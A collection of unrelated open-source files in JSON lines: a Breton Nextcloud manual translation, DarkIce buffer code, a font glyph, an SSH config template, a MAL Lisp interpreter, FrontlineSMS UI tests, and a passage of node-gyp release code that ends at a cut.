{"text": "# SOME DESCRIPTIVE TITLE.\n# Copyright (C) 2020 Nextcloud GmbH\n# This file is distributed under the same license as the Nextcloud latest User Manual package.\n# FIRST AUTHOR , YEAR.\n# \n# Translators:\n# Pierre Ozoux , 2020\n# Kervoas-Le Nabat Ewen , 2020\n# \n#, fuzzy\nmsgid \"\"\nmsgstr \"\"\n\"Project-Id-Version: Nextcloud latest User Manual latest\\n\"\n\"Report-Msgid-Bugs-To: \\n\"\n\"POT-Creation-Date: 2020-07-31 17:04+0000\\n\"\n\"PO-Revision-Date: 2020-07-27 12:48+0000\\n\"\n\"Last-Translator: Kervoas-Le Nabat Ewen , 2020\\n\"\n\"Language-Team: Breton (https://www.transifex.com/nextcloud/teams/64236/br/)\\n\"\n\"MIME-Version: 1.0\\n\"\n\"Content-Type: text/plain; charset=UTF-8\\n\"\n\"Content-Transfer-Encoding: 8bit\\n\"\n\"Language: br\\n\"\n\"Plural-Forms: nplurals=5; plural=((n%10 == 1) && (n%100 != 11) && (n%100 !=71) && (n%100 !=91) ? 0 :(n%10 == 2) && (n%100 != 12) && (n%100 !=72) && (n%100 !=92) ? 1 :(n%10 ==3 || n%10==4 || n%10==9) && (n%100 < 10 || n% 100 > 19) && (n%100 < 70 || n%100 > 79) && (n%100 < 90 || n%100 > 99) ? 2 :(n != 0 && n % 1000000 == 0) ? 3 : 4);\\n\"\n\n#: ../../index.rst:5\nmsgid \"Nextcloud |version| user manual introduction\"\nmsgstr \"Dornlevr ambroug an implijer evit Nextcloud |stumm|\"\n\n#: ../../index.rst:7\nmsgid \"**Welcome to Nextcloud: A safe home for all your data.**\"\nmsgstr \"**Donemat war Nextcloud : Ul lec'h sur evit tout ho roadennoù.**\"\n\n#: ../../index.rst:9\nmsgid \"\"\n\"Nextcloud is open source file sync and share software for everyone from \"\n\"individuals operating the free Nextcloud Server in the privacy of their own \"\n\"home, to large enterprises and service providers supported by the Nextcloud \"\n\"Enterprise Subscription. Nextcloud provides a safe, secure, and compliant \"\n\"file synchronization and sharing solution on servers that you control.\"\nmsgstr \"\"\n\"Nextcloud a zo ur c'hempreder ha ranner restr open source evit an dud a \"\n\"implij Servijourien Nextcloud en o zi, betek an embregerezhioù douget gant \"\n\"Nextcloud Enterprise Subscription. Nextcloud a ro ur c'hempredañ restroù sur\"\n\" hag aes, hag un doare rannañ war ur servijour kontrolet ganeoc'h.\"\n\n#: ../../index.rst:15\nmsgid \"\"\n\"You can share one or more files and folders on your computer, and \"\n\"synchronize them with your Nextcloud server. Place files in your local \"\n\"shared directories, and those files are immediately synchronized to the \"\n\"server and to other devices using the Nextcloud Desktop Sync Client, Android\"\n\" app, or iOS app. To learn more about the Nextcloud desktop and mobile \"\n\"clients, please refer to their respective manuals:\"\nmsgstr \"\"\n\"Posupl eo deoc'h enrollañ meur a restr ha teuliad war hoc'h urzhiataer, ha \"\n\"kemprendañ anezho gant ar servijour Nextcloud. Lakait ar restroù en ho \"\n\"teuliadoù kempredet war hoc'h urzhiataer, ha kempredet a vo ar restroù en un\"\n\" doare otomatik war ar servijour ha war an ardivinkoù a implij ar C'hliant \"\n\"Kemprendañ Burev Nextcloud, ar meziant Android, pe ar meziant iOS. 
Evit \"\n\"deskiñ muioc'h diwar-benn ar c'hliant burev Nextcloud hag hezoug, sellit \"\n\"ouzh an dornlevrioù mañ :\"\n\n#: ../../index.rst:22\nmsgid \"`Nextcloud Desktop Client`_\"\nmsgstr \"'Burev kliant Nextcloud'\"\n\n#: ../../index.rst:23\nmsgid \"`Nextcloud Android App`_\"\nmsgstr \"'Meziant Android Nextcloud'\"\n\n#: ../../index.rst:28\nmsgid \"\"\n\"`Help translate `_.\"\nmsgstr \"\"\n\"`Sikourit an treiñ `_.\"\n"} {"text": "/*------------------------------------------------------------------------------\n\n Copyright (c) 2000 Tyrell Corporation. All rights reserved.\n\n Tyrell DarkIce\n\n File : BufferedSink.cpp\n Version : $Revision$\n Author : $Author$\n Location : $Source$\n \n the buffer is filled like this:\n \n buffer bufferEnd\n | |\n +----------+--------------------------+--------------+\n |<---- valid data -------->|\n outp inp \n\n buffer bufferEnd\n | |\n +----------------+--------------+--------------------+\n -- valid data -->| |--- valid data ----->\n inp outp\n\n\n\n Copyright notice:\n\n This program is free software; you can redistribute it and/or\n modify it under the terms of the GNU General Public License \n as published by the Free Software Foundation; either version 2\n of the License, or (at your option) any later version.\n \n This program is distributed in the hope that it will be useful,\n but WITHOUT ANY WARRANTY; without even the implied warranty of \n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the \n GNU General Public License for more details.\n \n You should have received a copy of the GNU General Public License\n along with this program; if not, write to the Free Software\n Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.\n\n------------------------------------------------------------------------------*/\n\n/* ============================================================ include files */\n\n#ifdef HAVE_CONFIG_H\n#include \"config.h\"\n#endif\n\n#ifdef HAVE_STRING_H\n#include \n#else\n#error need string.h\n#endif\n\n\n#include \"Exception.h\"\n#include \"BufferedSink.h\"\n\n\n/* =================================================== local data structures */\n\n\n/* ================================================ local constants & macros */\n\n/*------------------------------------------------------------------------------\n * File identity\n *----------------------------------------------------------------------------*/\nstatic const char fileid[] = \"$Id$\";\n\n\n/* =============================================== local function prototypes */\n\n\n/* ============================================================= module code */\n\n/*------------------------------------------------------------------------------\n * Initialize the object\n *----------------------------------------------------------------------------*/\nvoid\nBufferedSink :: init ( Sink * sink,\n unsigned int size,\n unsigned int chunkSize ) throw ( Exception )\n{\n if ( !sink ) {\n throw Exception( __FILE__, __LINE__, \"no sink\");\n }\n\n this->sink = sink; // create a reference\n this->chunkSize = chunkSize ? 
chunkSize : 1;\n this->bufferSize = size;\n // make bufferSize a multiple of chunkSize\n this->bufferSize -= this->bufferSize % this->chunkSize;\n this->peak = 0;\n this->misalignment = 0;\n this->buffer = new unsigned char[bufferSize];\n this->bufferEnd = buffer + bufferSize;\n this->inp = buffer;\n this->outp = buffer;\n}\n\n\n/*------------------------------------------------------------------------------\n * Copy Constructor\n *----------------------------------------------------------------------------*/\nBufferedSink :: BufferedSink ( const BufferedSink & buffer )\n throw ( Exception )\n{\n init( buffer.sink.get(), buffer.bufferSize, buffer.chunkSize);\n\n this->peak = buffer.peak;\n this->misalignment = buffer.misalignment;\n memcpy( this->buffer, buffer.buffer, this->bufferSize);\n}\n\n\n/*------------------------------------------------------------------------------\n * De-initalize the object\n *----------------------------------------------------------------------------*/\nvoid\nBufferedSink :: strip ( void ) throw ( Exception )\n{\n if ( isOpen() ) {\n close();\n }\n\n sink = 0; // delete the reference\n delete buffer;\n}\n\n\n/*------------------------------------------------------------------------------\n * Assignment operator\n *----------------------------------------------------------------------------*/\nBufferedSink &\nBufferedSink :: operator= ( const BufferedSink & buffer )\n throw ( Exception )\n{\n if ( this != &buffer ) {\n strip();\n Sink::operator=( buffer );\n init( buffer.sink.get(), buffer.bufferSize, buffer.chunkSize);\n \n this->peak = buffer.peak;\n this->misalignment = buffer.misalignment;\n memcpy( this->buffer, buffer.buffer, this->bufferSize);\n }\n\n return *this;\n}\n\n\n/*------------------------------------------------------------------------------\n * Store bufferSize bytes into the buffer\n * All data is consumed. 
The return value is less then bufferSize only\n * if the BufferedSink's internal buffer is smaller than bufferSize,\n * thus can't hold that much\n * The data to be stored is treated as parts with chunkSize size\n * Only full chunkSize sized parts are stored\n *----------------------------------------------------------------------------*/\nunsigned int\nBufferedSink :: store ( const void * buffer,\n unsigned int bufferSize ) throw ( Exception )\n{\n const unsigned char * buf;\n unsigned int size;\n unsigned int i;\n unsigned char * oldInp;\n\n if ( !buffer ) {\n throw Exception( __FILE__, __LINE__, \"buffer is null\");\n }\n\n if ( !bufferSize ) {\n return 0;\n }\n\n oldInp = inp;\n buf = (const unsigned char *) buffer;\n \n // adjust so it is a multiple of chunkSize\n bufferSize -= bufferSize % chunkSize;\n\n // cut the front of the supplied buffer if it wouldn't fit\n if ( bufferSize > this->bufferSize ) {\n size = this->bufferSize - 1;\n size -= size % chunkSize; // keep it a multiple of chunkSize\n buf += bufferSize - size;\n } else {\n size = bufferSize;\n }\n\n // copy the data into the buffer\n i = bufferEnd - inp;\n if ( (i % chunkSize) != 0 ) {\n throw Exception( __FILE__, __LINE__, \"copy quantity not aligned\", i);\n }\n\n if ( size <= i ) {\n // the place between inp and bufferEnd is\n // big enough to hold the data\n \n memcpy( inp, buf, size);\n inp = slidePointer( inp, size);\n\n // adjust outp, lose the data that was overwritten, if any\n if ( outp > oldInp && outp <= inp ) {\n outp = slidePointer( inp, chunkSize);\n }\n\n } else {\n // the place between inp and bufferEnd is not\n // big enough to hold the data\n // writing will take place in two turns, once from\n // inp -> bufferEnd, then from buffer ->\n\n memcpy( inp, buf, i);\n i = size - i;\n if ( (i % chunkSize) != 0 ) {\n throw Exception(__FILE__, __LINE__, \"copy quantity not aligned\", i);\n }\n memcpy( this->buffer, buf, i);\n inp = slidePointer( this->buffer, i);\n \n // adjust outp, lose the data that was overwritten, if any\n if ( outp <= oldInp ) {\n if ( outp < inp ) {\n outp = slidePointer( inp, chunkSize);\n }\n } else {\n outp = slidePointer( inp, chunkSize);\n }\n }\n\n updatePeak();\n\n if ( ((inp - this->buffer) % chunkSize) != 0 ) {\n throw Exception( __FILE__, __LINE__,\n \"inp not aligned\", inp - this->buffer);\n }\n if ( ((outp - this->buffer) % chunkSize) != 0 ) {\n throw Exception( __FILE__, __LINE__,\n \"outp not aligned\", outp - this->buffer);\n }\n\n return size;\n}\n\n\n/*------------------------------------------------------------------------------\n * Write some data to the sink\n * if len == 0, try to flush the buffer\n *----------------------------------------------------------------------------*/\nunsigned int\nBufferedSink :: write ( const void * buf,\n unsigned int len ) throw ( Exception )\n{\n unsigned int length;\n unsigned int soFar;\n unsigned char * b = (unsigned char *) buf;\n\n if ( !buf ) {\n throw Exception( __FILE__, __LINE__, \"buf is null\");\n }\n\n if ( !isOpen() ) {\n return 0;\n }\n\n if ( !align() ) {\n return 0;\n }\n\n // make it a multiple of chunkSize\n len -= len % chunkSize;\n\n // try to write data from the buffer first, if any\n if ( inp != outp ) {\n unsigned int size = 0;\n unsigned int total = 0;\n\n if ( outp > inp ) {\n // valuable data is between outp -> bufferEnd and buffer -> inp\n // try to write the outp -> bufferEnd\n // the rest will be written in the next if\n\n size = bufferEnd - outp - 1;\n size -= size % chunkSize;\n soFar = 0;\n\n while ( 
outp > inp && soFar < size && sink->canWrite( 0, 0) ) {\n length = sink->write( outp + soFar, size - soFar);\n outp = slidePointer( outp, length);\n soFar += length;\n }\n\n total += soFar;\n }\n\n if ( outp < inp ) {\n // valuable data is between outp and inp\n // in the previous if wrote all data from the end\n // this part will write the rest\n\n size = inp - outp;\n soFar = 0;\n\n while ( soFar < size && sink->canWrite( 0, 0) ) {\n length = sink->write( outp + soFar, size - soFar);\n outp = slidePointer( outp, length);\n soFar += length;\n }\n\n total += soFar;\n }\n\n while ( (outp - buffer) % chunkSize ) {\n slidePointer( outp, 1);\n }\n\n // calulate the misalignment to chunkSize boundaries\n misalignment = (chunkSize - (total % chunkSize)) % chunkSize;\n }\n\n if ( !align() ) {\n return 0;\n }\n\n // the internal buffer is empty, try to write the fresh data\n soFar = 0;\n if ( inp != outp ) {\n while ( soFar < len && sink->canWrite( 0, 0) ) {\n soFar += sink->write( b + soFar, len - soFar);\n }\n }\n length = soFar;\n\n // calulate the misalignment to chunkSize boundaries\n misalignment = (chunkSize - (length % chunkSize)) % chunkSize;\n\n if ( length < len ) {\n // if not all fresh could be written, store the remains\n\n store( b + length, len - length);\n }\n\n // tell them we ate everything up to chunkSize alignment\n return len;\n}\n\n\n/*------------------------------------------------------------------------------\n * Close the sink, lose all pending data\n *----------------------------------------------------------------------------*/\nvoid\nBufferedSink :: close ( void ) throw ( Exception )\n{\n if ( !isOpen() ) {\n return;\n }\n\n flush();\n sink->close();\n inp = outp = buffer;\n}\n\n\n/*------------------------------------------------------------------------------\n \n $Source$\n\n $Log$\n Revision 1.6 2002/10/19 12:21:28 darkeye\n fixed comment typo\n\n Revision 1.5 2001/08/30 17:25:56 darkeye\n renamed configure.h to config.h\n\n Revision 1.4 2000/11/11 12:33:13 darkeye\n added kdoc-style documentation\n\n Revision 1.3 2000/11/10 20:16:21 darkeye\n first real tests with multiple streaming\n\n Revision 1.2 2000/11/05 14:08:27 darkeye\n changed builting to an automake / autoconf environment\n\n Revision 1.1.1.1 2000/11/05 10:05:48 darkeye\n initial version\n\n \n------------------------------------------------------------------------------*/\n\n"} {"text": "StartChar: seven.propold\nEncoding: 65546 -1 90\nWidth: 450\nFlags: W\nTtInstrs:\nSVTCA[y-axis]\nPUSHW_1\n 2\nMDAP[rnd]\nPUSHW_1\n 0\nRCVT\nIF\nPUSHW_1\n 1\nMDAP[rnd]\nELSE\nPUSHW_2\n 1\n 2\nMIAP[no-rnd]\nEIF\nPUSHW_1\n 0\nRCVT\nIF\nPUSHW_1\n 4\nMDAP[rnd]\nELSE\nPUSHW_2\n 4\n 2\nMIAP[no-rnd]\nEIF\nPUSHW_1\n 1\nSRP0\nPUSHW_1\n 0\nMDRP[rp0,min,rnd,grey]\nPUSHW_1\n 6\nMDRP[rp0,grey]\nIUP[y]\nIUP[x]\nEndTTInstrs\nLayerCount: 2\nFore\nSplineSet\n490 586 m 1,0,-1\n 479 481 l 1,1,-1\n 154 -105 l 1,2,-1\n 20 -105 l 1,3,-1\n 367 480 l 1,4,-1\n 67 480 l 1,5,-1\n 76 586 l 1,6,-1\n 490 586 l 1,0,-1\nEndSplineSet\nEndChar\n"} {"text": "\"\"\"\nThis config file would have the credentials of remote server,\nthe commands to execute, upload and download file path details.\n\"\"\"\n#Server credential details needed for ssh\nHOST='Enter your host details here'\nUSERNAME='Enter your username here'\nPASSWORD='Enter your password here'\nPORT = 22\nTIMEOUT = 10\n\n#.pem file details\nPKEY = 'Enter your key filename here'\n\n#Sample commands to execute(Add your commands here)\nCOMMANDS = ['ls;mkdir sample']\n\n#Sample file locations to 
upload and download\nUPLOADREMOTEFILEPATH = '/etc/example/filename.txt'\nUPLOADLOCALFILEPATH = 'home/filename.txt'\nDOWNLOADREMOTEFILEPATH = '/etc/sample/data.txt'\nDOWNLOADLOCALFILEPATH = 'home/data.txt'\n"} {"text": "(de load-relative (Path)\n (load (pack (car (file)) Path)) )\n\n(load-relative \"readline.l\")\n(load-relative \"types.l\")\n(load-relative \"reader.l\")\n(load-relative \"printer.l\")\n(load-relative \"env.l\")\n(load-relative \"func.l\")\n(load-relative \"core.l\")\n\n(de READ (String)\n (read-str String) )\n\n(def '*ReplEnv (MAL-env NIL))\n(for Bind *Ns (set> *ReplEnv (car Bind) (cdr Bind)))\n\n(de starts-with (Ast Sym) ;; MAL list, symbol -> nil or second element of Ast\n (let (L (MAL-value Ast)\n A0 (car L))\n (and (= (MAL-type A0) 'symbol)\n (= (MAL-value A0) Sym)\n (cadr L))))\n\n(de quasiquote-loop (Xs) ;; list -> MAL list\n (MAL-list\n (when Xs\n (let (Elt (car Xs)\n Unq (when (= (MAL-type Elt) 'list)\n (starts-with Elt 'splice-unquote))\n Acc (quasiquote-loop (cdr Xs)))\n (if Unq\n (list (MAL-symbol 'concat) Unq Acc)\n (list (MAL-symbol 'cons) (quasiquote Elt) Acc))))))\n\n(de quasiquote (Ast)\n (case (MAL-type Ast)\n (list (or (starts-with Ast 'unquote)\n (quasiquote-loop (MAL-value Ast))))\n (vector (MAL-list (list (MAL-symbol 'vec) (quasiquote-loop (MAL-value Ast)))))\n ((map symbol) (MAL-list (list (MAL-symbol 'quote) Ast)))\n (T Ast)))\n\n(de is-macro-call (Ast Env)\n (when (= (MAL-type Ast) 'list)\n (let A0 (car (MAL-value Ast))\n (when (= (MAL-type A0) 'symbol)\n (let Value (find> Env (MAL-value A0))\n (and (isa '+Func Value) (get Value 'is-macro) T) ) ) ) ) )\n\n(de macroexpand (Ast Env)\n (while (is-macro-call Ast Env)\n (let (Ast* (MAL-value Ast)\n Macro (get (find> Env (MAL-value (car Ast*))) 'fn)\n Args (cdr Ast*) )\n (setq Ast (apply (MAL-value Macro) Args)) ) )\n Ast )\n\n(de EVAL (Ast Env)\n (catch 'done\n (while t\n (when (not (= (MAL-type Ast) 'list))\n (throw 'done (eval-ast Ast Env)) )\n (setq Ast (macroexpand Ast Env))\n (when (or (not (= (MAL-type Ast) 'list)) (not (MAL-value Ast)))\n (throw 'done (eval-ast Ast Env)) )\n (let (Ast* (MAL-value Ast)\n A0* (MAL-value (car Ast*))\n A1 (cadr Ast*)\n A1* (MAL-value A1)\n A2 (caddr Ast*)\n A3 (cadddr Ast*) )\n (cond\n ((= A0* 'def!)\n (throw 'done (set> Env A1* (EVAL A2 Env))) )\n ((= A0* 'quote)\n (throw 'done A1) )\n ((= A0* 'quasiquoteexpand)\n (throw 'done (quasiquote A1)))\n ((= A0* 'quasiquote)\n (setq Ast (quasiquote A1)) ) # TCO\n ((= A0* 'defmacro!)\n (let Form (EVAL A2 Env)\n (put Form 'is-macro T)\n (throw 'done (set> Env A1* Form)) ) )\n ((= A0* 'macroexpand)\n (throw 'done (macroexpand A1 Env)) )\n ((= A0* 'let*)\n (let Env* (MAL-env Env)\n (for (Bindings A1* Bindings)\n (let (Key (MAL-value (pop 'Bindings))\n Value (EVAL (pop 'Bindings) Env*) )\n (set> Env* Key Value) ) )\n (setq Env Env* Ast A2) ) ) # TCO\n ((= A0* 'do)\n (mapc '((Form) (EVAL Form Env)) (head -1 (cdr Ast*)))\n (setq Ast (last Ast*)) ) # TCO\n ((= A0* 'if)\n (if (not (memq (MAL-type (EVAL A1 Env)) '(nil false)))\n (setq Ast A2) # TCO\n (if A3\n (setq Ast A3) # TCO\n (throw 'done *MAL-nil) ) ) )\n ((= A0* 'fn*)\n (let (Binds (mapcar MAL-value A1*)\n Body A2\n Fn (MAL-fn\n (curry (Env Binds Body) @\n (let Env* (MAL-env Env Binds (rest))\n (EVAL Body Env*) ) ) ) )\n (throw 'done (MAL-func Env Body Binds Fn)) ) )\n (T\n (let (Ast* (MAL-value (eval-ast Ast Env))\n Fn (car Ast*)\n Args (cdr Ast*) )\n (if (isa '+MALFn Fn)\n (throw 'done (apply (MAL-value Fn) Args))\n (let Env* (MAL-env (get Fn 'env) (get Fn 'params) Args)\n 
(setq Ast (get Fn 'ast) Env Env*) ) ) ) ) ) ) ) ) )\n\n(de eval-ast (Ast Env)\n (let Value (MAL-value Ast)\n (case (MAL-type Ast)\n (symbol (get> Env Value))\n (list (MAL-list (mapcar '((Form) (EVAL Form Env)) Value)))\n (vector (MAL-vector (mapcar '((Form) (EVAL Form Env)) Value)))\n (map (MAL-map (mapcar '((Form) (EVAL Form Env)) Value)))\n (T Ast) ) ) )\n\n(set> *ReplEnv 'eval (MAL-fn (curry (*ReplEnv) (Form) (EVAL Form *ReplEnv))))\n(set> *ReplEnv '*ARGV* (MAL-list (mapcar MAL-string (cdr (argv)))))\n\n(de PRINT (Ast)\n (pr-str Ast T) )\n\n(de rep (String)\n (PRINT (EVAL (READ String) *ReplEnv)) )\n\n(rep \"(def! not (fn* (a) (if a false true)))\")\n(rep \"(def! load-file (fn* (f) (eval (read-string (str \\\"(do \\\" (slurp f) \\\"\\nnil)\\\")))))\")\n(rep \"(defmacro! cond (fn* (& xs) (if (> (count xs) 0) (list 'if (first xs) (if (> (count xs) 1) (nth xs 1) (throw \\\"odd number of forms to cond\\\")) (cons 'cond (rest (rest xs)))))))\")\n\n\n(load-history \".mal_history\")\n\n(if (argv)\n (rep (pack \"(load-file \\\"\" (car (argv)) \"\\\")\"))\n (use Input\n (until (=0 (setq Input (readline \"user> \")))\n (let Output (catch 'err (rep Input))\n (if (isa '+MALError Output)\n (let Message (MAL-value Output)\n (unless (= (MAL-value Message) \"end of token stream\")\n (prinl \"[error] \" (pr-str Message)) ) )\n (prinl Output) ) ) ) ) )\n\n(prinl)\n(bye)\n"} {"text": "package frontlinesms2.webconnection\n\nimport frontlinesms2.*\nimport frontlinesms2.message.*\nimport frontlinesms2.popup.*\nimport frontlinesms2.announcement.*\n\nimport spock.lang.*\n\nclass WebconnectionViewSpec extends WebconnectionBaseSpec {\n\tdef setup() {\n\t\tcreateWebconnections()\n\t\tcreateTestActivities()\n\t\tdef wcId = remote { Webconnection.findByName(\"Sync\").id }\n\t\tcreateTestMessages(wcId)\n\t}\n\n\tdef \"Webconnection page should show the details of a generic Webconnection in the header\"() {\n\t\tsetup:\n\t\t\tdef webconnectionName = remote { Webconnection.findByName(\"Sync\").name }\n\t\twhen:\n\t\t\tto PageMessageWebconnection, webconnectionName\n\t\tthen:\n\t\t\twaitFor { title == 'webconnection.title[Sync]' }\n\t\t\theader.name == 'webconnection.title[sync]'\n\t\t\theader.url == 'http://www.frontlinesms.com/sync'\n\t\t\theader.sendMethod == 'get'\n\t\t\theader.subtitle == 'webconnection.generic.subtitle[generic]'\n\t\t\theader.api == 'webconnection.api.url : (webconnection.api.disabled)'\n\t}\n\n\t@Unroll\n\tdef 'Webconnection page should show API url, excluding secret, iff API is enabled'() {\n\t\tsetup:\n\t\t\tdef webconnectionName = remote { GenericWebconnection.build(name:'me', apiEnabled:true, secret:secret, url:'http://test.com').name }\n\t\t\tdef wcId = remote { GenericWebconnection.findByName('me').id }\n\t\twhen:\n\t\t\tto PageMessageWebconnection, webconnectionName\n\t\tthen:\n\t\t\theader.api.endsWith \"/api/1/webconnection/$wcId\"\n\t\twhere:\n\t\t\tsecret << [null, 'imagine']\n\t}\n\n\tdef \"Webconnection page should show the details of an Ushahidi Webconnection in the header\"() {\n\t\tsetup:\n\t\t\tdef webconnectionName = remote { Webconnection.findByName(\"Ush\").name }\n\t\twhen:\n\t\t\tto PageMessageWebconnection, webconnectionName\n\t\tthen:\n\t\t\twaitFor { title == 'webconnection.title[Ush]' }\n\t\t\theader.name == 'webconnection.title[ush]'\n\t\t\theader.url == 'http://www.ushahidi.com/frontlinesms'\n\t\t\theader.sendMethod == 'get'\n\t\t\theader.subtitle == 'webconnection.ushahidi.subtitle[ushahidi]'\n\t}\n\n\tdef \"clicking the archive button archives the Webconnection and 
redirects to inbox \"() {\n\t\twhen:\n\t\t\tto PageMessageWebconnection, \"Sync\"\n\t\tthen:\n\t\t\twaitFor { header.displayed }\n\t\twhen:\n\t\t\theader.archive.click()\n\t\tthen:\n\t\t\twaitFor { at PageMessageInbox }\n\t\t\tnotifications.flashMessageText == 'default.archived[activity.label]'\n\t}\n\n\tdef \"clicking the edit option opens the Webconnection Dialog for editing\"() {\n\t\twhen:\n\t\t\tto PageMessageWebconnection, \"Sync\"\n\t\tthen:\n\t\t\twaitFor { header.displayed }\n\t\twhen:\n\t\t\theader.moreActions.value(\"edit\").jquery.click()\n\t\tthen:\n\t\t\twaitFor(\"veryslow\") { at WebconnectionWizard }\n\t}\n\n\tdef \"Clicking the Send Message button brings up the Quick Message Dialog\"() {\n\t\twhen:\n\t\t\tto PageMessageWebconnection, \"Sync\"\n\t\t\twaitFor { header.quickMessage.displayed }\n\t\t\theader.quickMessage.click()\n\t\tthen:\n\t\t\twaitFor('veryslow'){ at QuickMessageDialog }\n\t\t\twaitFor{ textArea.displayed }\n\t}\n\n\tdef \"clicking the rename option opens the rename small popup\"() {\n\t\twhen:\n\t\t\tto PageMessageWebconnection, \"Sync\"\n\t\tthen:\n\t\t\twaitFor { header.displayed }\n\t\twhen:\n\t\t\theader.moreActions.value(\"rename\").jquery.click()\n\t\tthen:\n\t\t\twaitFor { at RenameDialog }\n\t\t\tname.jquery.val().contains(\"Sync\")\n\t}\n\n\tdef \"clicking the delete option opens the confirm delete small popup\"() {\n\t\twhen:\n\t\t\tto PageMessageWebconnection, \"Sync\"\n\t\tthen:\n\t\t\twaitFor { header.displayed }\n\t\twhen:\n\t\t\theader.moreActions.value(\"delete\").jquery.click()\n\t\tthen:\n\t\t\twaitFor { at DeleteActivity }\n\t}\n\n\tdef \"clicking the export option opens the export dialog\"() {\n\t\twhen:\n\t\t\tto PageMessageWebconnection, \"Sync\"\n\t\tthen:\n\t\t\twaitFor { header.displayed }\n\t\twhen:\n\t\t\theader.moreActions.value(\"export\").jquery.click()\n\t\tthen:\n\t\t\twaitFor { at ExportDialog }\n\t}\n\n\tdef \"selecting a single message reveals the single message view\"() {\n\t\twhen:\n\t\t\tto PageMessageWebconnection, \"Sync\"\n\t\tthen:\n\t\t\twaitFor { messageList.displayed }\n\t\twhen:\n\t\t\tmessageList.toggleSelect(0)\n\t\tthen:\n\t\t\twaitFor { singleMessageDetails.displayed }\n\t\t\twaitFor { singleMessageDetails.text == \"Test message 0\" }\n\t}\n\n\tdef \"selecting multiple messages reveals the multiple message view\"() {\n\t\twhen:\n\t\t\tto PageMessageWebconnection, \"Sync\"\n\t\tthen:\n\t\t\twaitFor { messageList.displayed }\n\t\twhen:\n\t\t\tmessageList.toggleSelect(0)\n\t\t\twaitFor { singleMessageDetails.displayed }\n\t\t\tmessageList.toggleSelect(1)\n\t\tthen:\n\t\t\twaitFor { multipleMessageDetails.displayed }\n\t\t\tmultipleMessageDetails.checkedMessageCount == 2\n\t}\n\n\tdef \"clicking on a message reveals the single message view with clicked message\"() {\n\t\twhen:\n\t\t\tto PageMessageWebconnection, \"Sync\"\n\t\tthen:\n\t\t\twaitFor { messageList.displayed }\n\t\twhen:\n\t\t\tmessageList.toggleSelect(3)\n\t\tthen:\n\t\t\twaitFor { singleMessageDetails.displayed }\n\t\t\tmessageList.hasClass(3, \"selected\")\n\t\t\twaitFor { singleMessageDetails.text == \"Test message 3\" }\n\t}\n\n\tdef \"delete single message action works \"() {\n\t\twhen:\n\t\t\tto PageMessageWebconnection, \"Sync\"\n\t\tthen:\n\t\t\twaitFor { messageList.displayed }\n\t\twhen:\n\t\t\tmessageList.toggleSelect(0)\n\t\tthen:\n\t\t\twaitFor { singleMessageDetails.displayed }\n\t\twhen:\n\t\t\tsingleMessageDetails.delete.click()\n\t\tthen:\n\t\t\twaitFor { messageList.displayed }\n\t\t\tmessageList.messageText(0) != 'Test message 
0'\n\t}\n\n\tdef \"delete multiple message action works for multiple select\"(){\n\t\twhen:\n\t\t\tto PageMessageWebconnection, \"Sync\"\n\t\tthen:\n\t\t\twaitFor { messageList.displayed }\n\t\twhen:\n\t\t\tmessageList.toggleSelect(0)\n\t\t\twaitFor { singleMessageDetails.displayed }\n\t\t\tmessageList.toggleSelect(1)\n\t\tthen:\n\t\t\twaitFor { multipleMessageDetails.displayed }\n\t\twhen:\n\t\t\tmultipleMessageDetails.deleteAll.click()\n\t\tthen:\n\t\t\twaitFor { messageList.displayed }\n\t\t\t!(messageList.messageText(0) in ['Test message 0', 'Test message 1'])\n\t\t\t!(messageList.messageText(1) in ['Test message 0', 'Test message 1'])\n\t}\n\n\tdef \"move single message action works\"() {\n\t\twhen:\n\t\t\tto PageMessageWebconnection, \"Sync\"\n\t\tthen:\n\t\t\twaitFor { messageList.displayed }\n\t\twhen:\n\t\t\tmessageList.toggleSelect(0)\n\t\tthen:\n\t\t\twaitFor { singleMessageDetails.displayed }\n\t\t\twaitFor { singleMessageDetails.text == \"Test message 0\" }\n\t\twhen:\n\t\t\tsingleMessageDetails.moveTo(remote { Activity.findByName(\"Sample Announcement\").id }).click()\n\t\tthen:\n\t\t\twaitFor(\"veryslow\") { at PageMessageWebconnection }\n\t\t\twaitFor { notifications.flashMessageText.contains(\"updated\") }\n\t\t\tmessageList.messageText(0) != 'Test message 0'\n\t\twhen:\n\t\t\tto PageMessageAnnouncement, \"Sample Announcement\"\n\t\tthen:\n\t\t\twaitFor { messageList.displayed }\n\t\t\tmessageList.messageText(0) == 'Test message 0'\n\t}\n\n\tdef \"move multiple message action works\"() {\n\t\twhen:\n\t\t\tto PageMessageWebconnection, \"Sync\"\n\t\tthen:\n\t\t\twaitFor { messageList.displayed }\n\t\twhen:\n\t\t\tmessageList.toggleSelect(0)\n\t\t\twaitFor { singleMessageDetails.displayed }\n\t\t\tmessageList.toggleSelect(1)\n\t\tthen:\n\t\t\twaitFor { multipleMessageDetails.displayed }\n\t\twhen:\n\t\t\tmultipleMessageDetails.moveTo(remote { Activity.findByName(\"Sample Announcement\").id }).click()\n\t\tthen:\n\t\t\twaitFor(\"veryslow\") { notifications.flashMessageText.contains(\"updated\") }\n\t\t\t!(messageList.messageText(0) in ['Test message 0', 'Test message 1'])\n\t\t\t!(messageList.messageText(1) in ['Test message 0', 'Test message 1'])\n\t\twhen:\n\t\t\tto PageMessageAnnouncement, \"Sample Announcement\"\n\t\tthen:\n\t\t\twaitFor { messageList.displayed }\n\t\t\tmessageList.messageText(0) in ['Test message 0', 'Test message 1']\n\t\t\tmessageList.messageText(1) in ['Test message 0', 'Test message 1']\n\t}\n\n\tdef \"should display SENT message status for successfully forwarded messages\"() {\n\t\twhen:\n\t\t\tto PageMessageWebconnection, \"Sync\"\n\t\tthen:\n\t\t\twaitFor { messageList.displayed }\n\t\t\tjs.exec '''\n\t\t\t\treturn $(\"#main-list tbody tr.ownerdetail-webconnection-SENT\").size() > 0\n\t\t\t'''\n\t}\n\n\tdef \"retry failed uploads option should be present in more actions dropdown, and should redirect to same view\"() {\n\t\twhen:\n\t\t\tto PageMessageWebconnection, \"Sync\"\n\t\tthen:\n\t\t\twaitFor { header.displayed }\n\t\twhen:\n\t\t\theader.moreActions.value('retryFailed')\n\t\tthen:\n\t\t\twaitFor { notifications.flashMessageText == 'webconnection.failed.retried' }\n\t\t\tat PageMessageWebconnection\n\t}\n}\n\n"} {"text": "var semver = require('semver')\n , url = require('url')\n , path = require('path')\n , log = require('npmlog')\n\n // versions where -headers.tar.gz started shipping\n , headersTarballRange = '>= 3.0.0 || ~0.12.10 || ~0.10.42'\n , bitsre = 